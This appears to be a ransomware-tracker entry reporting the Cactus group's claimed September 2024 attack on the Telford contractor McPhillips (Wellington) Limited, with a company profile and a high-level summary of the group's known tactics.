McPhillips Construction Faces Major Cactus Ransomware Breach

Incident Date:

September 3, 2024

World map

Overview

Title

McPhillips Construction Faces Major Cactus Ransomware Breach

Victim

McPhillips

Attacker

Cactus

Location

Telford, United Kingdom

, United Kingdom

First Reported

September 3, 2024

McPhillips Construction Company Hit by Cactus Ransomware Attack

McPhillips (Wellington) Limited, a prominent civil engineering and building contractor based in Telford, Shropshire, has become the latest victim of a ransomware attack orchestrated by the Cactus ransomware group. The attack has resulted in the exfiltration of approximately 1.2TB of sensitive data, including personal identifiable information (PII) of customers, detailed engineering drawings, project plans, employee and executive personal data, financial documents, contracts, and corporate correspondence.

About McPhillips

Founded in 1963, McPhillips (Wellington) Limited has established a strong reputation for delivering high-quality construction solutions to both public and private sector clients across the Midlands, Northwest England, and Mid & North Wales. The company specializes in a wide range of services, including new builds, refurbishments, and various infrastructure projects such as roads, highways, bridges, drainage systems, and earthworks. With a workforce of over 280 employees, McPhillips emphasizes local employment, with 92% of its personnel residing within 20 miles of its headquarters.

Attack Overview

The Cactus ransomware group has claimed responsibility for the attack on McPhillips via their dark web leak site. The attackers have exfiltrated a significant amount of data, but less than 1% of the stolen information has been disclosed publicly. The leaked data reveals that McPhillips collaborates with various clients in both the commercial and residential sectors. The company, which has an annual revenue of $40.8 million, is now grappling with the ramifications of this significant cybersecurity incident.

About the Cactus Ransomware Group

Identified in March 2023, the Cactus ransomware group has quickly become a notable player in the ransomware landscape. Cactus employs sophisticated tactics to target commercial entities, primarily through exploiting vulnerabilities in VPN appliances. The group is known for its double-extortion strategy, where they not only encrypt data but also threaten to leak sensitive information if the ransom is not paid. Cactus ransomware employs a unique approach by encrypting its own binary to evade detection by antivirus software, complicating the identification and mitigation of the threat.

Penetration and Impact

Cactus primarily gains access to networks by exploiting known vulnerabilities in VPN devices, notably those from Fortinet, and vulnerabilities in data analytics platforms like Qlik Sense. The group has been known to leverage phishing attacks and purchase stolen credentials from underground forums to facilitate their intrusions. Once inside a network, Cactus establishes command and control communications via SSH and utilizes Scheduled Tasks to maintain persistence across system reboots. The malware performs network scanning to identify additional targets within the compromised environment and often disables security software to facilitate its operations.

Recent Ransomware Attacks

The Recent Ransomware Attacks (RRA) site acts as a watchtower, providing you with near real-time ransomware tracking of attacks, groups and their victims. Given threat actors’ overarching, lucrative success so far, ransomware attacks have become the most ubiquitous, and financially and informationally impactful cyber threat to businesses and organizations today.

The site’s data is generated based on hosting choices of real-world threat actors, and a handful of other trackers. While sanitization efforts have been taken, we cannot guarantee 100% accuracy of the data. Attack updates will be made as source data is reported by reputable sources. By viewing, accessing, or using RRA you acknowledge you are doing so at your own risk.